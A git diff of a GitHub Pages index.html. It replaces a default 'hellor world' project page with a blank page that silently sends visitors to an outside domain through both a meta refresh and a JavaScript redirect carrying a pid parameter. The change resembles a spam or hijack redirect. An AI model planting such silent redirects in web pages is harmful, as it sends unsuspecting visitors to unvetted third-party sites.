--- a/index.html
+++ b/index.html
@@ -1,50 +1,13 @@
-<!DOCTYPE html>
 <html>
-
-  <head>
-    <meta charset='utf-8'>
-    <meta http-equiv="X-UA-Compatible" content="chrome=1">
-    <meta name="description" content="Tk.GitHub.com : ">
-
-    <link rel="stylesheet" type="text/css" media="screen" href="stylesheets/stylesheet.css">
-
-    <title>Tk.GitHub.com</title>
-  </head>
-
-  <body>
-
-    <!-- HEADER -->
-    <div id="header_wrap" class="outer">
-        <header class="inner">
-          <a id="forkme_banner" href="https://github.com/77231457/tk.github.com">View on GitHub</a>
-
-          <h1 id="project_title">Tk.GitHub.com</h1>
-          <h2 id="project_tagline"></h2>
-
-            <section id="downloads">
-              <a class="zip_download_link" href="https://github.com/77231457/tk.github.com/zipball/master">Download this project as a .zip file</a>
-              <a class="tar_download_link" href="https://github.com/77231457/tk.github.com/tarball/master">Download this project as a tar.gz file</a>
-            </section>
-        </header>
-    </div>
-
-    <!-- MAIN CONTENT -->
-    <div id="main_content_wrap" class="outer">
-      <section id="main_content" class="inner">
-        <h1>
-<a id="hellor-world" class="anchor" href="#hellor-world" aria-hidden="true"><span class="octicon octicon-link"></span></a>hellor world</h1>
-      </section>
-    </div>
-
-    <!-- FOOTER  -->
-    <div id="footer_wrap" class="outer">
-      <footer class="inner">
-        <p class="copyright">Tk.GitHub.com maintained by <a href="https://github.com/77231457">77231457</a></p>
-        <p>Published with <a href="http://pages.github.com">GitHub Pages</a></p>
-      </footer>
-    </div>
-
-    
-
-  </body>
+<head>
+        <title></title>
+        <meta http-equiv="refresh" content="0;url=http://www.chenmeifang18.com/html/index.html?pid=a3">
+</head>
+<body>
+<div style="display:none;">
+</div>
+<script>
+window.location.href="http://www.chenmeifang18.com/html/index.html?pid=a3";
+</script>
+</body>
 </html>
